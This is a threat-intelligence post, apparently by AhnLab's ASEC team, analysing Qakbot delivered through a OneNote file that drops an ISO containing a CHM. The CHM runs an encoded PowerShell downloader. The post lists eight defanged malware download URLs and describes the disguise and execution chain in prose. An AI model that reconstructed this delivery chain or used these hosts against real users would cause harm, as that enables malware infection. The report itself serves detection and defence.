Qakbot Distributed via OneNote and CHM
AhnLab Security Emergency response Center (ASEC) has covered various distribution methods of Qakbot, and the method of distributing through OneNote was covered back in February. The distribution of Qakbot through OneNote has been confirmed again recently, and it was discovered that the Windows Help file (CHM) was used in this recent attack. https://asec.ahnlab.com/en/47785/ Upon executing the OneNote file, it prompts users to click on the Open button along with a Microsoft Azure image, as shown below. An ISO file is hidden inside the location of this button, and once a user clicks the Open button, an ISO file is created in a temp folder and mounted.
A CHM disguised as a README file exists inside the ISO, prompting users to open it.
Upon executing the CHM file, a normal help screen regarding network connectivity is displayed, making it difficult for the user to notice the malicious behavior.
The malicious script used without the user’s knowledge is shown below. A malicious and encoded PowerShell command is executed through CMD. This command is executed through the Click method used similarly by the existing CHM malware.
The decoded PowerShell command is shown below. The command attempts to download additional malicious files from multiple URLs and save them to the %TEMP%\antepredicamentPersecutory.tuners path. Seeing how it is executed through rundll32 afterward, it can be assumed that DLL files are downloaded.
- Download URL hxxps://nayadofoundation[.]org/wXaKm/SQ2wfto2vosn hxxps://citytech-solutions[.]com/6Mh1k/OJMPf hxxps://zainco[.]net/OdOU/9IAsdunbnH hxxps://gsscorporationltd[.]com/okSfj/rAVykcQiX hxxps://mrcrizquna[.]com/L7ccN/kz5AeBZ6 hxxps://hotellosmirtos[.]com/sjn/uhidwrQ9Hz hxxps://carladvogadatributaria[.]com/tvnq9/i8zBwKW hxxps://erg-eg[.]com/ocmb/xvjmmvS
This command is similar to the command used by the Qakbot that was distributed via PDF back in April. This download URL is currently unavailable, but internal and external infrastructures showed that the Qakbot binary had been distributed from the URL when a connection could be made to it. https://asec.ahnlab.com/en/51282/ Recently, the number of malware distribution cases using OneNote has been increasing, and threat actors have been using various formats of files for their attacks. Users must be careful when opening emails and OneNotes from unknown sources. AhnLab’s anti-malware product, V3, detects and blocks the malware using the alias below. [File Detection] Dropper/MSOffice.Generic (2023.04.24.03) Downloader/CHM.Generic (2023.04.24.03)
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
